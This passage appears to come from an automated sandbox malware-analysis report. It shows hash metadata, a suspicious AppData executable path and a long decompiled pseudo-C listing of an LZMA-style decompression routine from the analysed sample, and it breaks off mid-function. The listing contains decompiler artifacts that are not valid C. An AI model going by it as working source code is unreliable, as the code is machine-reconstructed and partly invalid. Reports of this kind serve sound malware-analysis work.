                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                              • String ID: "C:\Users\user\AppData\Roaming\propser16364.exe"$\*.*
                                                              • API String ID: 2035342205-691726750
                                                              • Opcode ID: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
                                                              • Instruction ID: f9fcd54ed45cecb295d84a7a00b3a90cccdf7efad1d91ba0bada197ffcbf79f0
                                                              • Opcode Fuzzy Hash: a66e31797c185062c7638da0132466ba220af7043d537e09de82d45b9939a7ed
                                                              • Instruction Fuzzy Hash: 0851C430900A44AADB21AB658C85BBF7A78DF42714F14417FF851711D2C77C7A82DE69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406925, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E00406925() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
